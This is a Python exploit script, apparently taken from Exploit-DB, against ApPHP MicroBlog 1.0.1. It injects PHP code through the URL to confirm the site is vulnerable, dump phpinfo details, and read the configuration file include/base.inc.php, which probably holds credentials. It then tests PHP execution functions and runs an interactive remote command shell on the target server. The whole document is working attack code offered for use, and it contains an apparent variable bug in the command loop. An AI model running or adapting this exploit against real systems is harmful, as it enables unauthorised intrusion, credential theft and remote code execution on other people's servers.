LOTFREEEDB-ID:33070
#!/usr/bin/python
import random
import hashlib
import urllib
from base64 import b64encode as b64
import sys
import re
# Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE
# Exploit Author: LOTFREE
# Version: ApPHP MicroBlog 1.0.1 (Free Version)
# EDB-ID: 33030
print " -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-"
print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/"
if len(sys.argv) < 2:
print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0])
sys.exit()
debug = False
CHECK_FMT = "{0}?{1});echo(base64_decode('{2}')=/"
INFO_FMT = "{0}?{1});echo(base64_decode('{2}'));phpinfo();echo(base64_decode('{3}')=/"
# to read include/base.inc.php
CONFIG_FMT = "{0}?{1});echo(base64_decode('{2}'));readfile(base64_decode('aW5jbHVkZS9iYXNlLmluYy5waHA%3D'));echo(base64_decode('{3}')=/"
EXEC_FMT = "{0}?{1});echo(base64_decode('{2}'));{3}(base64_decode('{4}'));echo(base64_decode('{5}')=/"
index_url = sys.argv[1]
char = chr(random.randint(97,122))
start_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
end_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
print "[*] Testing for vulnerability..."
random_mark = hashlib.md5(str(random.random())).hexdigest()[:15]
url = CHECK_FMT.format(index_url, char, b64(random_mark))
if debug:
print url
r = urllib.urlopen(url)
if not random_mark in r.read():
print "[-] Website is not vulnerable :'("
sys.exit()
print "[+] Website is vulnerable"
print
def extract_between(data):
global start_mark
global end_mark
if start_mark not in data or end_mark not in data:
print "[-] Oops. Something went wrong :("
return ""
return data.split(start_mark, 1)[1].split(end_mark, 1)[0]
print "[*] Fecthing phpinfo"
url = INFO_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
if debug:
print url
r = urllib.urlopen(url)
output = extract_between(r.read())
output = re.compile(r'<[^<]*?/?>').sub(' ', output)
interesting_values = [
"PHP Version",
"System",
"Loaded Configuration File",
"Apache Version",
"Server Root",
"DOCUMENT_ROOT",
"allow_url_",
"disable_functions",
"open_basedir",
"safe_mode",
"User/Group"]
for line in output.split("\n"):
line = line.strip()
if line:
for value in interesting_values:
if line.startswith(value):
print "\t" + line
print
print "[*] Fetching include/base.inc.php"
url = CONFIG_FMT.format(index_url, char, b64(start_mark), b64(end_mark))
if debug:
print url
r = urllib.urlopen(url)
output = extract_between(r.read())
print output
print
exec_functions = ["system", "passthru", "exec", "shell_exec"]
valid_exec = None
print "[*] Testing remote execution"
for func in exec_functions:
# trying to exec "echo LOTFREE"
url = EXEC_FMT.format(index_url, char, b64(start_mark), func, "ZWNobyBMT1RGUkVF", b64(end_mark))
if debug:
print url
r = urllib.urlopen(url)
output = extract_between(r.read())
if "LOTFREE" in output:
valid_exec = func
break
if valid_exec is None:
print "[-] Did not manage to execute commands :("
sys.exit()
print "[+] Remote exec is working with {0}() :)".format(valid_exec)
print "Submit your commands, type exit to quit"
while True:
try:
cmd = raw_input("> ").strip()
except EOFError:
print
break
if cmd == "exit":
print
break
if (len(cmd) % 3) > 0:
padding = " " * (3 - len(cmd) % 3)
cmd = cmd + padding
url = EXEC_FMT.format(index_url, char, b64(start_mark), func, b64(cmd), b64(end_mark))
if debug:
print url
r = urllib.urlopen(url)
output = extract_between(r.read())
print output
print